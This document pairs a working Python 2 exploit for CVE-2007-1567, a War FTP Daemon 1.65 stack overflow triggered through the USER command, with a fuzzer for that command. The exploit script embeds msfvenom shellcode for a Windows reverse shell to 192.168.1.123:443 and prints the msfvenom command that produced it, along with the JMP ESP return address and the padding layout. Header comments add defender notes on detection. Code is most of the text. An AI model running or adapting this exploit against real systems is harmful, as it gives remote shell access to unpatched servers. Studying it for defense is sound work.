# CVE-2007-1567 War FTP Daemon 1.65堆棧緩衝區溢出漏洞
==warftp-ftp.py==
# warftp-ftp.py -- proof-of-concept for CVE-2007-1567 (War FTP Daemon 1.65, stack buffer overflow in the USER command).
# What the script does: opens one TCP connection to 192.168.1.131:21, reads the banner, sends a single
# `USER` command whose argument is several thousand bytes long (485 x 'A', the 4-byte address 0x774699BF the
# author annotates as a JMP ESP, 20 NOP bytes, the msfvenom-generated payload, then 'C' padding), reads one
# reply and prints "Done!.".
# Defender notes: a legitimate USER argument is a short printable name; an argument of thousands of bytes
# consisting mostly of one repeated character followed by non-printable bytes is the observable signature of
# this overflow class, so a length cap on the USER argument at the FTP service or an inline filter rejects it.
# The payload is annotated as a reverse shell to 192.168.1.123:443, i.e. a compromised server would open an
# outbound TCP connection to that address -- egress monitoring is the corresponding detection point.
# Code notes: Python 2 syntax (print statements, str buffers); the bare `except:` hides every failure,
# network-related or not, behind the "Could not connect to FTP!" message.
#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 774699BF FFE4 JMP ESP # bad characters \x00\x0a\x0d # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.123 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows shellcode = ("\xd9\xed\xba\xda\x93\x0e\xa1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1" "\x52\x31\x55\x17\x83\xc5\x04\x03\x8f\x80\xec\x54\xd3\x4f\x72" "\x96\x2b\x90\x13\x1e\xce\xa1\x13\x44\x9b\x92\xa3\x0e\xc9\x1e" "\x4f\x42\xf9\x95\x3d\x4b\x0e\x1d\x8b\xad\x21\x9e\xa0\x8e\x20" "\x1c\xbb\xc2\x82\x1d\x74\x17\xc3\x5a\x69\xda\x91\x33\xe5\x49" "\x05\x37\xb3\x51\xae\x0b\x55\xd2\x53\xdb\x54\xf3\xc2\x57\x0f" "\xd3\xe5\xb4\x3b\x5a\xfd\xd9\x06\x14\x76\x29\xfc\xa7\x5e\x63" "\xfd\x04\x9f\x4b\x0c\x54\xd8\x6c\xef\x23\x10\x8f\x92\x33\xe7" "\xed\x48\xb1\xf3\x56\x1a\x61\xdf\x67\xcf\xf4\x94\x64\xa4\x73" "\xf2\x68\x3b\x57\x89\x95\xb0\x56\x5d\x1c\x82\x7c\x79\x44\x50" "\x1c\xd8\x20\x37\x21\x3a\x8b\xe8\x87\x31\x26\xfc\xb5\x18\x2f" "\x31\xf4\xa2\xaf\x5d\x8f\xd1\x9d\xc2\x3b\x7d\xae\x8b\xe5\x7a" "\xd1\xa1\x52\x14\x2c\x4a\xa3\x3d\xeb\x1e\xf3\x55\xda\x1e\x98" "\xa5\xe3\xca\x0f\xf5\x4b\xa5\xef\xa5\x2b\x15\x98\xaf\xa3\x4a" "\xb8\xd0\x69\xe3\x53\x2b\xfa\xcc\x0c\x32\x81\xa4\x4e\x34\x74" "\x8e\xc6\xd2\x1c\xe0\x8e\x4d\x89\x99\x8a\x05\x28\x65\x01\x60" "\x6a\xed\xa6\x95\x25\x06\xc2\x85\xd2\xe6\x99\xf7\x75\xf8\x37" "\x9f\x1a\x6b\xdc\x5f\x54\x90\x4b\x08\x31\x66\x82\xdc\xaf\xd1" "\x3c\xc2\x2d\x87\x07\x46\xea\x74\x89\x47\x7f\xc0\xad\x57\xb9" "\xc9\xe9\x03\x15\x9c\xa7\xfd\xd3\x76\x06\x57\x8a\x25\xc0\x3f" "\x4b\x06\xd3\x39\x54\x43\xa5\xa5\xe5\x3a\xf0\xda\xca\xaa\xf4" "\xa3\x36\x4b\xfa\x7e\xf3\x6b\x19\xaa\x0e\x04\x84\x3f\xb3\x49" "\x37\xea\xf0\x77\xb4\x1e\x89\x83\xa4\x6b\x8c\xc8\x62\x80\xfc" "\x41\x07\xa6\x53\x61\x02") buffer = "A" * 485 + "\xbf\x99\x46\x77" + "\x90" * 20 + shellcode + "C" * (5500-485-4) try: print "\nSending evil buffer..." 
s.connect(("192.168.1.131", 21)) s.recv(1024) s.send('USER ' + buffer + '\r\n') data=s.recv(1024) print "\nDone!." except: print "Could not connect to FTP!"
==ftp-user-fuzz.py==
# ftp-user-fuzz.py -- length fuzzer for the FTP USER command against 192.168.1.131:21.
# Builds a list of 30 'A' strings (the first is 1 byte; the rest run 100, 300, ... 5700 bytes in steps of
# 200) and, for each one, opens a fresh connection, reads the banner, sends `USER <string>`, reads the reply,
# sends QUIT and closes the socket. Python 2 syntax (print statement). There is no error handling: a failed
# connect() or recv() raises and ends the script at that length.
# Defender notes: this shows up as a burst of very short FTP sessions from one source, each carrying a
# progressively longer USER argument -- a length cap on the USER argument and a per-source connection-rate
# alert both surface it, and the length cap is also what a patched parser enforces.
#!/usr/bin/python import socket buffer = ["A"] counter=100 while len(buffer) < 30: buffer.append("A"*counter) counter=counter+200 for string in buffer: print "Fuzzing USER with %s bytes" % len(string) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(("192.168.1.131", 21)) s.recv(1024) s.send('USER ' + string + '\r\n') s.recv(1024) s.send('QUIT\r\n') s.close()